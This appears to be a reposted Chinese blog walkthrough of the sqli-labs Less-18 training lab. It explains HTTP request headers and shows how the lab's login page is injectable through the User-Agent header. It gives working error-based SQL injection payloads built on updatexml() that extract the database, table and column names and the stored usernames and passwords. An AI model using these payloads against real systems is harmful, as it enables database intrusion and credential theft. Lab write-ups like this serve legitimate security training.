Less18

Less18

个人最终版

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or UPDATEXML(1, (SELECT CONCAT_WS(0x7e,id,username,PASSWORD) FROM users LIMIT 0,1),1) , '127.1', 'admin')
SELECT UPDATEXML(1, (SELECT CONCAT_WS(0x7e,id,username,PASSWORD) FROM users LIMIT 0,1),1) 
select updatexml(0,concat(0x7e,(select group_concat(table_name) from information_schema.`TABLES` where table_schema=database())),1);

所有测试语句

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('asdad' or ,'','')#', '$IP', $uname)
(select * from (select concat_ws('#',id,username,password) from users limit 0,1) 
 SELECT CONCAT_ws(0x7e,id,username,PASSWORD) FROM users LIMIT 0,1
 select UPDATEXML(1, (SELECT CONCAT_WS(0x7e,id,username,PASSWORD) FROM users LIMIT 0,1),1) 
 INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'','')#aa','127.0.0.1','admin')#', '$IP', $uname)

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or UPDATEXML(1, (SELECT CONCAT_WS(0x7e,id,username,PASSWORD) FROM users LIMIT 0,1),1) , '127.1', 'admin')

 INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)
 SELECT UPDATEXML(1, (SELECT CONCAT_WS(0x7e,id,username,PASSWORD) FROM users LIMIT 0,1),1) 
 select updatexml(0,concat(0x7e,(select group_concat(table_name) from information_schema.`TABLES`  where table_schema=database())),1);
 SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES`  WHERE table_schema=DATABASE()
 select concat('#',(select 1,group_concat(table_name) from information_schema.`TABLES`  where table_schema=database())
 select concat('a','b')
 select 1,group_concat(table_name) from information_schema.`TABLES`  where table_schema=database()

基于错误_POST_User-Agent_请求头注入

0x01. HTTP请求头

这些在HTTP协议里讲的很详细，就不多说了，任何一本Web的书都会介绍。
这里列出几个常用请求头：

1. Host
   Host请求报头域主要用于指定被请求资源的Internet主机和端口号。
   如：Host: localhost:8088

2. User-Agent
   User-Agent请求报头域允许客户端将它的操作系统、浏览器和其他属性告诉服务器。登录一些网站时，很多时候都可以见到显示我们的浏览器、系统信息，这些都是此头的作用。
   如：User-Agent: Mozilla/5.0

3. Referer
   Referer包含一个URL，代表当前访问URL的上一个URL，也就是说，用户是从什么地方来到本页面。
   如：Referer: http://localhost:8088/sqlilabs/Less-18/

4. Cookie
   Cookie是非常重要的请求头，它是一段文本，常用来表示请求者身份等。
   如：Cookie: username=admin; password=admin

5. Range
   Range可以请求实体的部分内容，多线程下载一定会用到此请求头。
   如：表示头500字节：Range: bytes=0~499
     表示第二个500字节：Range: bytes=500~999
     表示最后500字节：Range: bytes=-500
     表示500字节以后的范围：Range: bytes=500-

6. X-Forwarded-For
   X-Forwarded-For即XXF头，它代表请求端的IP，可以有多个，中间以逗号隔开。
   如：X-Forwarded-For: 8.8.8.8

7. Accept
   Accept请求报头域用于指定客户端接收哪些MIME类型的信息。
   如：Accept: text/html

8. Accept-Charset
   Accept-Charset请求报头域用于指定客户端接收的字符集。如果在请求消息中没有设置这个域，默认是任何字符集都可以接收。
   如： Accept-Charset: gb2312

0x02. 寻找注入点

首先还是尝试什么都不对的情况：

 

 

回显能够显示你的IP地址，这里自然会想到是不是XFF头注入。一航师傅的WP也是这么写的，但是后来多次尝试未果，看后台源码后查资料发现是不对的。

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

源码使用HTTP_USER_AGENT只获取了HTTP请求头的一个部分：User-Agent。
而获取IP则使用了REMOTE_ADDR，这能直接获取TCP协议数据包的底层会话IP地址，它能被代理服务器或路由修改伪造，但非修改XFF头就可以更改的。

再看源码：

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

对POST的uname和passwd都做了check_input()处理，在Less17已经分析了这个函数，所以表单不存在注入点。

不论是否登录成功，都会回显IP。
登陆成功后回显uagent，并将uagent、IP、uname插入到security数据库的uagents表的uagent、ip_address、username三个字段中。

 

 

经过这次尝试可以看到：修改XFF头对IP没有影响，登陆成功会回显你的User-Agent。
这里要输入正确的账号和密码才能绕过账号密码判断，进入处理User-Agent部分。这跟现实中的注册登录再注入是比较贴合。

所以注入点就在User-Agent处。

0x03. 注入过程

我们已经得出注入语句为INSERT，根据Less17中的介绍，这里有很多方法可以注入，我们选择updatexml()注入。

这里我们仍需要根据回显报错来判断INSERT语句结构，首先任意尝试：

User-Agent: Hyafinthus' updatexml(1,concat('#',(database())),0)--+

 

 

可以看到uagent是在IP和uname之前的，即INSERT语句：

INSERT INTO table_name ('uagent','ip_address','username') VALUES ('$uagent','$IP','$uname')

步骤1：数据库名security

User-Agent: Hyafinthus' or updatexml(1,concat('#',(database())),0),'','')#

 

 

注意：这里并不是URL而是HTTP头，所以+并不会被转义为(空格)，于是末尾的注释符号要变为#。

步骤2：表名users

User-Agent: ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'','')#

 

 

注意：因为这里or的语法，User-Agent应为空。而步骤1成功的原因不确定，教程中也为空但没有影响，猜测是数据库版本的问题。

步骤3：字段名id、username、password

User-Agent: ' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'','')#

 

 

步骤4：数据

User-Agent: ' or updatexml(1,concat('#',(select * from (select concat_ws('#',id,username,password) from users limit 0,1) a)),0),'','')#

 

 

注意：同样因为错误信息只显示了一部分，使用limit偏移注入。

作者：Hyafinthus
链接：https://www.jianshu.com/p/c876a7f96eb5
来源：简书
著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。